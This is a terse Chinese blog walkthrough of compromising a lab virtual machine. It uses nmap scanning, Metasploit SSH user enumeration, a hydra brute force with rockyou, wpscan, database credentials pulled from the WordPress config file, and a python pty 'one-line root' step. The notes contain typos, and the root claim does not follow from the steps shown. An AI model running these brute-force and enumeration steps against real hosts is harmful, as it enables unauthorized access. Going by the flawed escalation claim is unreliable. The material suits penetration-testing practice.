文章讲述了作者通过主机扫描工具netdiscover和nmap探测目标主机,发现OpenSSHd的用户枚举漏洞,并利用暴力破解获取了michael和steven的用户名和密码。进一步通过Wordpress的SQL注入获取数据库信息,最终实现了一句话提权为root。
主机扫描·
netdiscover -i eth0 -r 192.168.10.0/24
# nmap --script=vuln 192.168.10.140 -p445 -v 对主机的扫描windows老版本 vuln常见的漏洞
namp 192.168.10.140 --script=auth -v 先/ 后加-sV auth 健权类验证脚本
由此发现了有ssh pub key /passwd的登陆方式 想看看有没有漏洞
漏洞分析
searchsploit openssh 发现OpenSSHd 7.2p2 - Username Enumeration 可以枚举用户和密码
想到直接爆破
nmap 192.168.10.140 -v --script=brute -p22 指定22进行暴力破解 发现很多用户的枚举信息
去msf里面看看有没有payload search 一下
search openssh user
use2
msf6 auxiliary(scanner/ssh/ssh_enumusers) > set rhost 192.168.10.140
找密码本
locate rockyou cp到当前目录下解压 生成字典:crunch 4 4 5(几位,多少个) 暴力破解:xhydra hydra 验证成功: ssh xshell
locate wordlist root 找用户名字典
msf6 auxiliary(scanner/ssh/ssh_enumusers) >set user_file ......./commom_roots.txt
msf6 auxiliary(scanner/ssh/ssh_enumusers) >run
找到许多的用户 进行筛选 打开linux 或者kali /etc/passwd 对比 发现像bin用户后面有nologin的字样----不能登陆舍去
发现用户只有
michael
root
steven
破解:
hydra -L user.txt -P rockyou.txt ssh://192.168.10.140 找到用户、密码:michael
登陆:
ssh micheal@192.168.10.140
id 看到用户uid 1000普通用户
再看看有没有其他的漏洞
如果遇到了解析不成功 打开hosts C:\Windows\System32\drivers\etc\hosts 添加 1929.168.10.140 raven.local 点击网络
看到是wordpress 指纹识别 版本漏洞 (也可以下载wordpress 进行漏洞重建)百度wordpress看到
区别:mysql5.5 允许用户下载访问.so
WordPress是一个使用PHP语言开发的博客平台。用户可以在支持PHP和MySQL数据库的服务器上建立自己的网站。
您还可以将 WordPress 用作内容管理系统 (CMS)。
想到去打mysql 拿到数据库
还可以去查询wordpress的表结构
wpscan --url http://192.168.10.140/wordpress -e u 用户名的枚举 发现michael steven 但不是后台管理员的密码
但在michael里面看到 ls 下有www cat一下发现flag2
然后进入wordpress 里面的word_config.php 里面有数据库的数据
直接mysql -uroot -p +密码
找到用户名 密码 发现只有steven可以解出来pink84 登陆后台发现flag3
发现这个也是登陆终端的用户和密码 steven@192.168.10.140
一句话提权:
python
python -c 'import pty;pty.spawn("/bin/bash")'
id 看到是root 成功
###靶机
扫一扫
8315
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
